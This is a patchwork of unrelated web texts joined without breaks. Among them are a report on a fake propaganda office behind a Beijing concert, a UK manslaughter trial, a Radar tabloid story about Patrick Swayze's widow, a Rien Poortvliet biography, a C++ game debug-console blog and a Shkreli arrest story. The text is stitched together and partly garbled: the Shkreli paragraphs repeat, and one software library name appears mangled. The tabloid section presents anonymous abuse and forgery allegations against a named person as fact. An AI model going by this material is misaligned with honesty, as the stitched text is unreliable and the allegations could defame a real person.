In preparation for the large-scale symphonic and choral concert “On the Field of Hope,” our partner fabricated the “Communist Party Central Committee Propaganda Department Office of Socialist Core Value Propaganda and Education” and supplied fake materials, betraying our trust. Our partner joint acted with us as the sponsoring work unit of the concert, held on May 2 in the Great Hall of the People. We will pursue the responsible persons in accordance with the law. China National Opera and Dance Drama Theater May 6, 2016
56 Flowers director Chen Guangze stated that he just learned about the fake office and is not prepared to speak on the issue.
Fakery aside, the program's overt references to the early days of the People's Republic seem all too sincere. Wearing the red scarves of Young Pioneers, 56 Flowers sang 30 “red songs,” including a Cultural Revolution favorite, “Sailing the Seas Depends on the Helmsman.” Vintage images from the 1950s and 1960s shone on the display behind them, including a painting of revolutionaries beneath a red flag emblazoned with a quote from Mao Zedong: “People of the world, unite to defeat the American invaders and their running dogs!”
In a Global Times op-ed, Shan Renping (a pen name of editor Hu Xijin) doubts that the concert had any “official backdrop.” He welcomes the controversy it has stirred up, acknowledging that “right now there are relatively more online posts remembering the Cultural Revolution. This is to be expected. After all, this year is its 50th anniversary.” He then reminds readers that the central government “thoroughly disavowed the Cultural Revolution” in its 1981 “Resolution on Party Historical Issues After the Founding of the Country.”
On Weibo, military historian and Big V Cai Xiaoxin asks why 56 Flowers director Chen Guangze has avoided discussing the imaginary government office: “Who did this illegal deed?” Commenters speculate:
Since directives are sometimes communicated orally to journalists and editors, who then leak them online, the wording published here may not be exact. The date given may indicate when the directive was leaked, rather than when it was issued. CDT does its utmost to verify dates and wording, but also takes precautions to protect the source. See CDT's collection of Directives from the Ministry of Truth since 2011.
Thanks for signing up!
Please help push this letter -- and the image of Mark Zuckerberg -- viral on Facebook, and let them know how furious we are. You can use these links:
Please use these links to spread the word:
If you're already on Facebook, click here to share with your friends. If you're already on Twitter, click here to tweet about the campaign: Tweet
Can you chip in a couple dollars to support Demand Progress's ongoing work?
We're a non-profit with a tiny staff and we're funded through small contributions from members like you. Anything you can contribute would be a big help in keeping us going:
Click here to donate to Demand Progress via PayPal or credit card.
Click here to donate to Demand Progress by ActBlue Express or credit card.
***You can also support our work by pre-ordering our forthcoming book about the story of the anti-SOPA fight. It's called Hacking Politics: How Geeks, Progressives, the Tea Party, Gamers, Anarchists, and Suits Teamed Up to Defeat SOPA and Save the Internet. In the spirit of the free culture movement, the ebook is being offered at a pay-what-you-wish price.
Thanks!
We've had a flurry of Star Wars toy unveilings this past week thanks to a Disney promotion ahead of The Last Jedi, and today marks a new day and another Star Wars release: stamps. The UK's national postal service Royal Mail has announced eight new stamps in celebration of the upcoming film. They feature Maz Kanata, Chewbacca, Supreme Leader Snoke, the newly introduced adorable Porgs, and the droids BB-8, R2-D2, C-3PO, and Rogue One's K-2SO. They've been illustrated by UK digital artist Malcolm Tween, and are available for pre-order with a release date of October 12. Royal Mail says the four droid stamps have hidden details that can only be revealed through a UV light.
The stamps come in both standard and collectible packs, with some limited to just 750 copies. The basic eight stamp packs costs £6.50 ($8.40), a framed set is £40 ($51.80), a BB-8 display set is £10 ($13), and a medal set starts from £19.99 ($25.90).
Royal Mail says Tween has also created scenes especially for each stamp that features a celebrated spaceship or vehicle with the hero character. Tween also illustrated a stamp set released in 2015 ahead of The Force Awakens, which featured Darth Vader, Luke Skywalker, and Han Solo from the original trilogy, and Finn, Rey, and Kylo Ren.
Are cinematic trailers helpful? I tend to file them in the same category as live-action shorts in that I'm not convinced they make me feel any more inclined to want a game after viewing. Conan Exiles is, however, a game I'm pretty excited for and this cinematic comes with news of its price and details of its special edition, should that sort of thing tickle your fancy.
First the latter. The game's 'Barbarian Edition' bills itself as the "ultimate introduction to the world of Conan the Barbarian" and comes with a host of goodies such as: a Conan Exiles digital comic book, six digital Conan the Avenger comic books (from Dark Horse Comics), 'The Coming of Conan' ebook, and 'The Art of Conan Exiles' digital artbook, among other things. This package will set you back $60/your localised equivalent, and more information can be found in this direction.
Now, that cinematic trailer:
"One of the really great things about working with Conan the Barbarian is that there is this huge pop cultural universe surrounding him," says developer Funcom's CEO Rui Casais. "Being able to team up with Dark Horse Comics, Modiphius, and other Conan creators has allowed us to build a special edition that speaks to both fans and those discovering Conan for the first time."
If, like me, you prefer in-game footage over cinematics, last week's look at Exiles' summonable god-like Avatars is pretty cool:
Conan Exiles is due to enter Early Access next week on January 31. "The standard edition of the game is priced at $29.99," reads an update post on the Funcom site. I reckon this will equate to £19.99 in UK money, however I'm in the process of confirming this—I'll update once I've heard back from the developer.
Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
A dad and daughter have been convicted of beating their neighbour to death after she punctured a football that landed in her garden.
William Gary Jelly, 48, and his daughter, Natalie Bollen, 28, were found guilty of manslaughter unanimously by jurors at Leicester Crown Court .
The court heard how the victim, Kelly Machin, 34, died from internal bleeding days after being assaulted at her home on August 23 last year.
Her body was discovered on the sofa of her house on the afternoon of September 5 by a friend who called round after not hearing from her for a few days.
Jelly, of Thorpe Astley, was not present in the dock when the guilty verdicts were announced on Wednesday, the Leicester Mercury reports.
(Image: SWNS)
(Image: Leicester Mercury)
He had been taken to hospital after collapsing in the dock earlier in the day.
Following the verdicts, Judge Nicholas Dean QC said: "This was an episode in which both defendants were angry and they behaved in an aggressive, bullying and a violent way, although not in a way that anyone expected it to lead to the death of Kelly Machin. The circumstances of this case are very unusual."
Jelly and Bollen - who were convicted after a 10-day trial - are now facing jail.
The court heard how "vulnerable" Miss Machin burst the football, which belonged to Bollen's children, after it was kicked over her fence.
She then threw it back before Bollen and Jelly went over to her house in Waldwick Close, Leicester Forest East, and assaulted her.
William Harbage QC, prosecuting, said: "This is a case which involves joint participation.
(Image: Leicestershire Police)
"Three punches were from the first defendant (Bollen) before there was a push from the second – it was joint violence."
He said the pair had gone round to Miss Machin's home to "bang her out", which was the threat Bollen had made to her.
Judge Dean remanded Bollen, a single mum-of-four, formerly of Waldwick Close, into custody to await sentencing in mid-June, pending the preparation of a psychiatric report.
Bollen's counsel said she was suffering from an emotionally unstable personality disorder, depression with psychotic features, post-traumatic stress disorder and anxiety.
Judge Dean told Bollen: "You've been convicted of manslaughter.
"You know it's a serious offence and a long sentence of imprisonment is inevitable."
(Image: SWNS)
Jelly, who is also on remand in custody, has a number of medical ailments.
His counsel said it was hoped Jelly's latest relapse would "resolve quickly".
The judge told the jury: "Mr Jelly isn't here and that's because he was taken ill soon after you left court just after lunch and he's been taken to hospital."
Jelly and Bollen both denied manslaughter throughout the 10-day trial, claiming they were not responsible for the death of Miss Machin, who was said by the prosecution to be an alcoholic and "vulnerable".
The court heard there were earlier disputes between Miss Machin and Bollen, who were next-door-but-one-neighbours.
On August 23, the football belonging to Bollen's children landed in the garden of Miss Machin – who punctured it before throwing it back over the fence of their adjacent gardens.
(Image: Mat Fascione/geograph)
Bollen, who was infuriated by Miss Machin's actions, went with her father to confront her, bursting into her home when the door was opened.
Bollen punched her in the face several times, before Jelly pushed her - causing her to fall backwards over a coffee table, fracturing five ribs, which ruptured her chest cavity, the court was told.
The victim received hospital treatment and was later discharged, police said.
But her injuries ultimately led to her bleeding to death shortly before she was due to have an operation.
After the verdicts, Detective Chief Inspector David Swift-Rollinson of East Midlands Special Operations Unit, said: "A seemingly minor incident resulted in a person losing their lives.
"While we're pleased that the two offenders have been found guilty, Kelly's family and friends are still feeling the loss of their loved one and hopefully this result will help them move on with their lives.
"The defendants' actions on that day were excessive and they attacked Kelly without regard for the consequences, and they now face a lengthy prison sentence and two families have been left devastated."
Bollen and Jelly will both be sentenced in June.
In his tragic last days, wasting away from savage pancreatic cancer, Patrick Swayze was imprisoned in a house of horrors – deserted by his cheating, abusive wife, who left the dying star to wallow in his own filth!
That's the shocking charge by one of the “Dirty Dancing” icon's closest friends, who rips the lid off what was believed to be a Hollywood fairy-tale marriage that lasted 34 years, ending when Patrick, 57, died of cancer on Sept 14, 2009.
According to the friend, Patrick's personal hell was made worse in his final months because wife Lisa Niemi kept the actor, who'd shrunk to a pitiful 90 pounds, a prisoner in his own home – banning his mother and loved ones from visiting.
PHOTOS: Shocking! 18 Celeb Domestic Violence Scandals That Rocked Hollywood
But a year-long investigation by Radar has discovered the Ghost star hid a dark secret and actually died from a broken heart — because Niemi had several affairs with both men AND women.
“He loved her with all his heart but it was a serious love-hate relationship,” the longtime friend told Radar.
“She would beat on him and he would beat on the walls and furniture. They fought and I covered up a lot of that — they destroyed hotel rooms, cars, their house …. It was abusive.”
When asked if Niemi would hit Swayze during his 21-month cancer fight, the friend told Radar: “Oh yeah, it didn't matter. She wouldn't hit him with stuff — she would claw at his arms and neck. She would punch and slap him.”
“As he got sick, he was defenseless,” his pal added.
“Cancer bought him from 180 pounds to 90 pounds. She always had to upper hand because he wouldn't hit her. He was adamant about never ever laying his hands on her.”
PHOTOS: Johnny Depp Caught With Mystery Woman Days After Amber Heard Domestic Abuse Scandal
In fact, the friend charges Niemi was neglecting her dying husband whenever his main care giver, younger brother Don Swayze, 57, was working or out of town.
“Lisa would be gone for hours doing whatever she was doing and Donnie would come in and Patrick would be lying in his own feces and pee,” the pal said.
The friend who spent years with Swayze and another family insider said Niemi was an “evil” moody control freak who was in charge of every aspect of the actor's life, his money, movie roles even how much he could spend at the store.
“He had another friend before me and Lisa had a falling out with him — so she pretty much forbade [Patrick] from ever seeing the friend again,” the pal said.
Swayze's childhood friend, Charlotte Stevens, told Radar she encouraged the star to dump Niemi, who he married in 1975, because of several affairs known only to his family and close friends.
PHOTOS: Amber Heard Was Arrested For Domestic Violence Against Ex Tasya Van Ree
“We would talk like old friends, like what was going on in our lives and [the affairs] would come up,” Stevens, 63, told Radar.
“I would tell him, ‘You mean to tell me she's having these affairs and you haven't stepped out on her?' And he would say, ‘No I don't want it used against me.”
The humiliated hunk however was hooked on a promise he made to his mother Patsy to never divorce Niemi for fear that she would reveal a dark secret that would ruin his career.
Joan Leighton, who runs the private fan-based chat room called “Perfectly Patrick,” posted a possible explanation as to why Swayze refused to divorce Niemi during a discussion about her infidelities.
“Patsy said to me that she made Patrick promise he'd never divorce Lisa until she [Patsy] was dead… and Lisa threatened to reveal it…. and it would be a scandal… that would hurt maybe someone plus hurt the Swayze family,” Joan wrote in an April 27, 2016 post.
A longtime die-hard fan, Leighton admitted to Radar that she wrote the post but claimed she was just reacting to what was being post by others on the site. She did however call Niemi a “black widow.”
Two months before Swayze died, Niemi, now 60 and remarried, stunned all of Swayze's friends and family by banning anyone from visiting him at their California home called “Rancho Bizarro.”
And that included his mother Pasty, who died in September 2013 at age 86 – shortly after Niemi attempted to toss her out of the Simi Valley home Swayze had purchased for her and the widow inherited.
“Could you imagine not being able to see your son who is dying?” a family friend close to Patsy told Radar. “It was unexplainable. There is no excuse for it and I don't know what Lisa was thinking.”
Even more stunning, Swayze wasn't allowed to leave.
“She wouldn't let me see him two months before he died!” the pal complained.
“She wouldn't even let him go outside the ranch… She pretty much kept him prisoner.”
Unable to communicate by phone, the lonely actor, eager for contact with the outside world, would frequently call friends and family in the middle of the night!
“He'd call me a 2 a.m. after she had already passed out and we would talk at that time!” the friend claimed. “It was unusual but yet again that was Lisa, she was that way.”
It was during the same two-month period that Swayze signed a new will that left his entire $40 million estate to Niemi and absolutely nothing to his family.
A handwriting expert commissioned by Radar claimed the signature was a forgery.
Rien Poortvliet ( Dutch pronunciation: [ˈrim ˈpoːrtflit];[1] 7 August 1932 – 15 September 1995) was a Dutch draughtsman and painter.
Born in Schiedam, he was best known for his drawings[2] of animals and for "Gnomes" in the famous series of books provided with text by Wil Huygen[3] and published by Harry N. Abrams, Inc. of New York City.
Being a plasterer's son from Schiedam, making a living as an artist did not seem an option for Rien Poortvliet. His parents were strict followers of the Dutch Reformed Church and were opposed to the idea of their oldest son going to an art academy.
Rien's aptitude for drawing showed early on. After primary education the young Rien worked at an ad agency, where he could make some use of his talent. He also had talent for the advertising profession because after he had completed his draft time in the Navy he rose to senior manager at Lintas, Unilever's ad agency.
Rien took more pleasure in the work he did on the side for several publishers. He illustrated various books, among them works by Jaap ter Haar [nl], Leonard Roggeveen [nl] and Godfried Bomans. He was also a passionate hunter, which led him to drawing various nature subjects.
By the end of the 1960s, Poortvliet was able to make a living as an independent illustrator. To supplement his income, he made a book out of his drawings and watercolours based on his hunting experiences. Later on, he also made a similar work concerning the life of Jesus Christ.
Poortvliet saw himself as a storyteller in drawings. His drawings told the tale, and at most he added a short caption.
For years his works were published by Van Holkema en Warendorf in Bussum, where his "Leven en werken van de Kabouter" (co-authored by Wil Huygen, English title is "Gnomes") saw an astonishing 59 printings. With the Gnomes series Poortvliet acquired international fame. This series took on a life of its own, and was turned into an animated series in 1985.
His books were translated into English, French, German, Swedish, Finnish, Spanish, Italian and other languages.
Fame and recognition [ edit ]
The general public was delighted with Poortvliet's drawings. Some critics thought Poortvliet hypocritical since he painted beautiful nature scenes while being a fervent hunter. Yet he was elated to be the centre of attention.[citation needed] He did well on television with his goatee, his corduroy trousers and his chequered jackets[citation needed]. For a few years, Poortvliet was a panel member in "Zo Vader, Zo Zoon" (a Dutch game show).
Poortvliet found recognition when Prince Bernhard opened the Rien Poortvliet Museum in 1992. This museum stood in the old, historic Town Hall of Middelharnis, "Fortunately far away from the modern art gang in Amsterdam" as Poortvliet said in an interview. The Rien Poortvliet Museum in Middelharnis has now closed its doors to the public (December 16, 2006). Because of sharply reduced visitor numbers the museum could no longer meet its financial obligations. It reopened on the island of Tiengemeten on 7 July 2009.
Rien Poortvliet died in Soest in 1995 of bone cancer at the age of 63. He was survived by his wife Corrie Bouman and their two sons.
In popular culture [ edit ]
Poortvliet is referred to as a "beloved illustrator of gnomes" in the popular cartoon comedy Archer (season 4, episode 12 "Sea Tunt - Part I").
Works [ edit ]
Jachttekeningen (1972) (English: Hunting Sketches ) ISBN 90-269-4801-8
(1972) (English: ) ISBN 90-269-4801-8 ...de Vossen hebben holen (1973) ISBN 90-269-4949-9 The living forest: a world of animals (1979) ISBN 0-8109-0911-1
(1973) ISBN 90-269-4949-9 Hij was een van ons (1974) ISBN 90-269-4947-2 He Was One of Us: The Life of Jesus of Nazareth (1994) ISBN 0-8010-7135-6
(1974) ISBN 90-269-4947-2 Te Hooi en te gras (1975) ISBN 90-269-6296-7 The Farm Book (1994) ISBN 0-8109-0817-4
(1975) ISBN 90-269-6296-7 Leven en werken van de Kabouter (1976, with writer Wil Huygen) ISBN 90-269-4958-8 Gnomes (1977) ISBN 0-8109-0965-0 (20th Anniv.) ISBN 0-8109-5498-2 (30th Anniv.)
(1976, with writer Wil Huygen) ISBN 90-269-4958-8 Het brieschend paard (1978) ISBN 90-269-4968-5 Horses (1996) ISBN 1-55670-430-5
(1978) ISBN 90-269-4968-5 Van de hak op de tak (1980) (autobiographical) ISBN 90-269-4306-7 Dutch Treat: The Artist's Life, Written and Painted by Himself (1983) ISBN 0-517-41535-6
(1980) (autobiographical) ISBN 90-269-4306-7 De oproep der kabouters (1981, with writer Wil Huygen) ISBN 90-269-4799-2 Secrets of the Gnomes (1982) ISBN 0-8109-1614-2
(1981, with writer Wil Huygen) ISBN 90-269-4799-2 De ark van Noach, of ere wie ere toekomt (1985) ISBN 90-242-3206-6 Noah's Ark (1992) 08-109-1371-2
(1985) ISBN 90-242-3206-6 Langs het tuinpad van mijn vaderen (1987) (about his ancestors' supposed lives) ISBN 90-242-4800-0 In my grandfather's house (1988) ISBN 0-8109-1126-4
(1987) (about his ancestors' supposed lives) ISBN 90-242-4800-0 Het boek van Klaas Vaak en het ABC van de slaap (1988, with writer Wil Huygen) ISBN 90-242-4499-4 The Book of the Sandman and the Alphabet of Sleep (1989) ISBN 0-8109-1524-3
(1988, with writer Wil Huygen) ISBN 90-242-4499-4 De tresoor van Jacob Jansz. Poortvliet (1991) ISBN 90-242-7171-1 Daily Life in Holland in the Year 1566 (1992) ISBN 0-8109-3309-8
(1991) ISBN 90-242-7171-1 Braaf (1992) ISBN 90-242-6903-2 Dogs (1996) ISBN 0-8109-8140-8
(1992) ISBN 90-242-6903-2 Aanloop (1993) (about man and nature throughout the centuries) ISBN 90-242-6937-7 Journey to the Ice Age: Mammoths and Other Animals of the Wild (1994) ISBN 0-8109-3648-8
(1993) (about man and nature throughout the centuries) ISBN 90-242-6937-7 Kabouter Spreekwoordenboek (posthumously in 1996, with writer Wil Huygen) (English: Book of Gnome Proverbs ) ISBN 90-242-7882-1
(posthumously in 1996, with writer Wil Huygen) (English: ) ISBN 90-242-7882-1 Het Kabouterkookboek (posthumously in 2003, with writer Wil Huygen) (English: Gnome Cookbook ) ISBN 90-242-8977-7
(posthumously in 2003, with writer Wil Huygen) (English: ) ISBN 90-242-8977-7 Tussen gaap & slaap (posthumously in 2003, revised edition of Het boek van Klaas Vaak en het ABC van de slaap) ISBN 90-435-0753-9
Get the biggest football stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
Winger Jonas Gutierrez has accused Newcastle manager Alan Pardew of callously kicking him out of Toon.
Argentina international Gutierrez has joined Norwich on loan until the end of the season, with a view to a permanent £3million move.
But he insisted Pardew FORCED him out after five years, telling him he had no future with the Geordies and needed to find another club to take him on.
The 30-year-old midfielder, who still has 18 months to run on his Newcastle contract, said: “The manager told me in December I was not going to play any more and told me to find myself another club.
“I don't know why it happened and I still don't understand what I did wrong.
“There were no rows with Alan Pardew or anything like that. He just said I needed to leave and that was that.
“I honestly don't know why I wasn't playing, you will have to ask the manager that. He just made his decision and that was it. Something must have happened – but I don't know what.”
(Image: Alex Livesey)
Gutierrez knew the writing was on the wall when he was left out of the FA Cup third round tie against Cardiff.
He admitted: “I was hoping I would get an opportunity in the cup. But instead I was left sitting in the stand. I was not even named in the squad for the game. So after that I knew it was all over for me. For five years before that I had always been in the starting XI. Then suddenly I wasn't even in the squad.
“I still don't know why and I don't think I will ever understand it. It's how football is and you just have to get on with it.”
But Gutierrez, who needs first-team ­football to give himself a chance of making Argentina's World Cup squad, said he would always remember the ­reaction of the Newcastle supporters and his fellow players when he left the club.
“The fans were really good to me,” said the player, who has 22 ­caps. “They showed me so much love and affection when I said I was leaving. All my team-mates were the same as well. They all wished me all the best for the future and hoped I would do well at Norwich.”
...even though it is an urban street, with a rather dense mixture of uses, my measurements on Google Maps show that from a cross-section of the street, 68% of it is dedicated solely to cars with the remainder dedicated to trees, bus shelters, benches, and finally, walking. How can we say that our design does not influence behaviour when clearly 68% of the street has been designed just for cars? This is what I call a 'biased' street, because it is biased towards a particular mode of transportation.
Even though Hoboken is a very walkable city and somewhat of an exception, I ran out and took this photo to prove a point that there is still, in America's most walkable city, a heavy bias towards cars. Is it possible to make a street that is unbiased? What would an unbiased street look like?
And, while we are at it, would it be possible to build a system where, if you do not drive, not a cent of your tax dollars goes into any car infrastructure (asphalt, traffic lights, stop signs), and vice versa for railroads and other transit? Would it be possible to create a system that allows all transportation modes to compete fairly on a level playing field - with no cross subsidization?
Yes. I believe that it would be possible to build such a city, and as a thought experiment, I will write about how I think such as system could look like, but it will require exploring what a 'street' is - which is quiet different to the conventional American definition.
Separating Streets and Roads
First, we need to understand that streets and roads are two very different things. Let's start with roads. Roads have a defined purpose - they get you from A to B. To be safe and convenient, they need to be relatively free-flowing and clear from obstructions. Roads may be small...
I recently finished a small side project. As the title suggests, I made a debug log console that is cross-platform and remotely connects to games.
I had two main goals. First, I believe debugging tools for games should primarily be external. They shouldn't be in-game overlays. A side project gives me an excuse to write this blog post to claim why. Second, there were a few open source libraries I wanted to learn more about. A side project is a great way to do so.
This post is kind of a project journal. It's not a technical deep dive. I dipped my toes into a few waters for the first time. I learned a few things and maybe you can too.
TL;DR
I wrote a remote logging console in C++. It runs on Windows, Mac, and Linux. One console can connect to multiple games running on multiple platforms at the same time.
Source Code: GitHub
Internal vs External
Before talking about my external console I want to talk about common internal tools.
Quake has the prototypical example of an in-game console. It is opened by tapping the tilde key. It's super fast for both reading log messages and inputting console commands.
Another type of developer tool is the real-time performance overlay. They show frame rate, memory usage, CPU profiler, etc. These overlays can spiral out of control. Here's a picture of Starcraft 2's in-game developer tools.
Designing for Performance, Scalability & Reliability: StarCraft II's Approach
If you look closely you might notice a video game in the background. It's completely obscured by gaudy debug visualizations. There are several more panels which developers can switch between. I'll bet $5 you switch by entering obscure, undocumented keyboard shortcuts.
My belief is that these visualizers are superior when they exist in external tools. And that every game reaches a point where developers really, really wish they had remote access to this treasure trove of information.
External tools offer an obvious advantage for headless servers, multiplayer games, and non-PC platforms (Playstation, Xbox, mobile, etc). If you like to see both your game and your telemetry at the same time it's even better for local PC development. Dual monitors have been a thing for quite awhile now.
There's clearly value in hacking a debug panel over gameplay. It's fast and easy. Especially with great libraries like ImGui. But remote tools provide so many advantages I'm inevitably frustrated when tools only exists in-game.
Design Requirements
Now let's move on to my side project. I had several initial requirements.
One console should be able to connect to multiple games. Multiple consoles should be able to connect to the same game. Games should broadcast their presence for easy discoverability. Two-way communication; game-to-console and console-to-game. Console should run on Windows, Mac, and Linux. Consoles and games can run on different platforms and still connect. Write everything in C++
Most of these points focus on ease of use. Limiting connections or having to open a multiple windows is unnecessary pain.
The C++ requirement is strictly for educational purposes. I'm a game developer which, for better or worse, is a C++ world. I would not necessarily recommend C++ for tools.
Technologies Used
These are some of the tools or technologies that were used in the final product. In some cases I tried several different options. Often times to great frustration. I'll go into more detail for each of these below.
ASIO — networking
Flatbuffers — network protocol
ImGui — user interface
GENie — project generation
Travis / Appveyor — continuous integration
VMPlayer — Linux virtual machine
Networking
It turns out that cross-platform networking in C++ is pretty hard! Well, that's not quite true. Let me rephrase. There aren't many cross-platform libraries. The ones that do exist almost all suck.
I asked folks on Twitter what they used. The answer was almost universally “roll your own wrapper with the bare minimum number of features you need”. Blech!
Here's a great StackOverflow post with a list of libraries. I tried several.
ZeroMQ
Uses LGPL license. GPL and LGPL code is incompatible with my eyeballs.
libuv
I should know better than to try something that is made for node.js. That's on me really.
Poor documentation. Very poor examples. No explanation of object lifetime or memory ownership. Lots of allocations. Painful all around.
nanomsg
Successor to ZeroMQ with an MIT license.
I like nanomsg quite a lot. It has a beautiful, elegant C interface. It's very easy to use. I had a partial implementation working.
Unfortunately it isn't the right fit for my needs. Nanomsg implements a handful of “scalability protocols”. I want UDP broadcast for discoverability which is, unfortunately, not among them.
ASIO
ASIO is what my project uses. I partially chose ASIO because the C++17 Networking TS is based on it. It feels useful to get a preview of things to come.
To be honest, I kind of hate ASIO. It's typical C++ bullshit. The code you are induced to write is ugly and hard to read. The underlying source code is inscrutable template crap. It breaks intellisense.
But it works. It's stable. And it's easy to integrate. Hrmph.
POCO
I briefly investigated POCO. It shows promise. With a working ASIO implementation I can't justify the time to implement POCO. Maybe someday down the road.
POCO is a pretty big collection of libraries. I only need a couple. Ripping out the parts I want and getting it to compile is a process.
Cross-platform code is a solved problem. All I should have to do is provide a few defines, compile every file, and link the necessary libraries. Voila! Alas most libraries overcomplicate things and force you to tediously deduce which files need to be compiled on which platforms. Or, even worse, they have a ./configure step which generates code per platform. Urgh.
Protocol
With a working network library I next need a flexible protocol for serializing network messages.
Protocol Buffers
Google's protobuf library is widely used, thoroughly tested, and well proven. So of course I chose something else.
I've worked with protobuf before. On Planetary Annihilation we even wrote our own version called Uberproto which was customized to our unique requirements. Because learning new things is a major goal for this side project I elected to try something new.
To be honest protobuf is what I should have used.
Synchronous
A successor to protobuf written by the same person. Performs zero copies which is all the rage these days.
Unfortunately it treats Windows as a second class citizen. A few years ago it didn't support Windows at all. Today it only supports a “lite mode” on Windows. Bah hum bug!
Flatbuffers
Flatbuffers is what my project uses. Flatbuffers is another serialization library from Google. It's similar to protobuf but written for games with an emphasis on speed. That sounds good!
It's not intended for network messsages. I'm pretty sure malformed messages can cause a crash due to lack of bounds checking. I don't think I build messages efficiently. I smooshed a square-peg through a round-hole. Which technically works but is inadvisable. In the spirit of learning new things I have no regrets.
Graphical User Interface
For the GUI I only ever intended to use ImGui. It's something I've wanted to play with for awhile.
My impression of ImGui is mostly positive. It's very lightweight and easy integrate. It has many different widgets ready to use out of the box. The examples are fantastic.
I found it very difficult to lay things out the way I wanted. It lacks built-in support for advanced features such as tabs or docking. Unfortunately it also lacks a formal way for third party extensions, plugins, or classes to be added.
ImGui is built to allow for easy creation of debug overlays that render on top of your game. Which is the exact thing I claim to be bad. Using it to make a standalone tool is a bit of a misuse. I encountered several square-peg, round-hole issues.
That said, I have no regrets and would gladly use ImGui again in the future. Omar Cornut has a Patreon for supporting the project. His effort is worth supporting.
Project Generation
I like it when open source code is easily to compile and tinker with. This project includes several sets of project files. Compiling on Windows is as easy as opening the Visual Studio solution file and clicking build. Mac and Linux have gmake files.
For generating these projects I used GENie by Branimir Karadžić. It's a fork of Premake 4. It uses a lua file to define project settings for Visual Studio, gmake, XCode, etc.
Here's a snippet of my genie.lua file showing the configuration for the Flatbuffers project.
Despite looking like data this is Lua script code. It confused me at first as well. In Lua you can exclude parenthesis on function calls if you're passing in either a string or a table constructor.
Project, targetdir, flags, files, configuration, etc are all functions. Those functions are being called and with either a single string or a table as an argument.
Shrekli is expected to be charged today for illegally using assets from Retrophin to pay off debts after his hedge fund lost millions of dollars, the source said.
Reuters witnessed law enforcement agents arresting a hoodie-clad Shkreli at the Murray Hill Tower Apartments and escorting him into a car in midtown Manhattan today. A spokesperson for the FBI confirmed Shkreli's arrest.
Shkreli's arrest Thursday comes after a fraud investigation stemming from his time as manager of hedge fund MSMB Capital Management and CEO of biopharmaceutical company Retrophin Inc, a person familiar with the matter said.
Shkreli, 32, sparked national outrage in the US earlier this year after his pharmaceutical company, Turing Pharmaceuticals Inc, hiked the price of the drug Daraprim, a common anti-parasitic drug, to $750 a tablet from $13.50 immediately after acquiring it. Shkreli staunchly defended his decision, responding "lol" to Hillary Clinton on Twitter after she criticized him.
Martin Shkreli, the notorious, price-gouging "pharma bro" who became a widely despised symbol for soaring drug prices earlier this year, was arrested by the FBI on Thursday after a federal investigation involving his former hedge fund and a pharmaceutical company he previously headed.
Read more
Martin Shkreli, the notorious, price-gouging "pharma bro" who became a widely despised symbol for soaring drug prices earlier this year, was arrested by the FBI on Thursday after a federal investigation involving his former hedge fund and a pharmaceutical company he previously headed.
Shkreli, 32, sparked national outrage in the US earlier this year after his pharmaceutical company, Turing Pharmaceuticals Inc, hiked the price of the drug Daraprim, a common anti-parasitic drug, to $750 a tablet from $13.50 immediately after acquiring it. Shkreli staunchly defended his decision, responding "lol" to Hillary Clinton on Twitter after she criticized him.
Shkreli's arrest Thursday comes after a fraud investigation stemming from his time as manager of hedge fund MSMB Capital Management and CEO of biopharmaceutical company Retrophin Inc, a person familiar with the matter said.
Reuters witnessed law enforcement agents arresting a hoodie-clad Shkreli at the Murray Hill Tower Apartments and escorting him into a car in midtown Manhattan today. A spokesperson for the FBI confirmed Shkreli's arrest.
Shrekli is expected to be charged today for illegally using assets from Retrophin to pay off debts after his hedge fund lost millions of dollars, the source said.
The probe dates back to at least January when Retrophin said it received a subpoena from prosecutors seeking information about its relationship with Shkreli.
Shares of Shkreli's pharmaceutical company, KaloBios Inc, fell by about 50 percent to $11.03 in premarket trading. His stake in the company plummeted by more than $25 million in value between Wednesday and when news of his arrest broke today, noted Market Watch.
In addition to angering pharmaceutical executives and consumers alike, Shkreli has also managed to piss off hip-hop fans too. He recently bought the sole copy of Wu-Tang Clan's latest album, Once Upon A Time In Shaolin, for $2 million after the rap group agreed to sell it to the highest bidder. He then threatened to destroy the CD.
Lawyers for Retrophin and Shkreli did not immediately respond to a request for comment. Turing and KaloBios declined to comment.
50-100 date solicitations a day for me, the world's most eligible bachelor. Sorry, but you have to be a shareholder to meet me.
— Martin Shkreli (@MartinShkreli)December 14, 2015
Do you want Test-* to be released with only one pair of eyes spending any significant time looking at it? No? Me either!
This blog post is a cry out for review. Test-Builder/More/Simple are being seriously reworked. From my perspective as the author of these changes everything looks fine, but that is just one set of eyes.
How can you help?
Download the latest Test-Simple dev release, make sure your stuff all works with it
Look at the source on github, comment on it. leave a +/-1 as a comment, or open an issue
Read the API documentation
Read the architecture documentation
Seriously pick any random file in lib/ and try to grok it
Ping me directly and ask how you can help
The git history on master does not lend itself well to review. This is a harder problem to solve. I have been urged by a couple people to rewrite history to make things more clear. I will take the time to make a cleaner branch where history is easier to read. Assuming the new branch works out, and accurately represents history, I will rename master to something else (but always keep it so that people can see it)
A new poll came out yesterday, and guess who ranked at the top?
I'll give you a hint - it wasn't someone the Democrats are embracing.
Trump continues to trail both Bernie Sanders (51/38) and Joe Biden (51/39) by double digits in possible 2020 match ups. PPP never found Hillary Clinton up by more than 7 points on Trump in 2016. Sanders and Biden each win over 12-14% of the folks who voted for Trump last year. Also leading Trump in hypothetical contests at this point are Elizabeth Warren (45/40), Mark Cuban (42/38), and Cory Booker and Trump Twitter Target Richard Blumenthal (42/39). Trump ties Kamala Harris at 39% each and John Delaney at 38% each.
Establishment Democrats like the two candidates that AREN'T beating the most unpopular president in history.
As for the candidate with the best chance of winning, the Dems have gone into yet another round of blaming and shaming his supporters, because that worked so well in 2016.
Bernie Sanders Voters Helped Trump Win and Here's Proof
1 In 10 Sanders Primary Voters Ended Up Supporting Trump, Survey Finds
The Bernie voters who defected to Trump, explained by a political scientist
So it's no longer Jill Stein that caused Hillary to lose. It's Bernie Bros that are to blame.
Let's cut to the chase: Between 6% and 12% of people who voted for Sanders in the primaries ended up voting for Trump in November.
That sounds bad until you put it in context.
1) 8% of Democrats voted for Trump. Which means a whole bunch of Hillary supporters voted for Trump as well.
2) A lot of Sanders supporters weren't/aren't Democrats.
Of course, we know that many Sanders voters did not readily identify with the Democratic Party as of 2016, and Schaffner found that Sanders-Trump voters were even less likely to identify as Democrats. Sanders-Trump voters didn't much approve of Obama either.
